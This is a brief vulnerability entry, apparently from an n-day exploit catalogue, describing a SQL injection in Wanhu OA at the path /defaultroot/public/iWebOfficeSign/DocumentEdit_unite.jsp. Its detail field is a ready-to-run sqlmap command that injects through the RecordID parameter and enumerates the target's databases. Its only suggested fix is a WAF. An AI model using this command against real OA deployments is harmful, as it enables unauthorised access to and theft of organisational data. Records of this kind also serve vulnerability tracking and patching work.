vendor = "万户"
name = "万户 OA SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp"
detail = "sqlmap -u \"http://xxx.com/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1\" --level 3 -dbs"
fix = "使用WAF进行拦截"
date = "0722"
label = "nday"
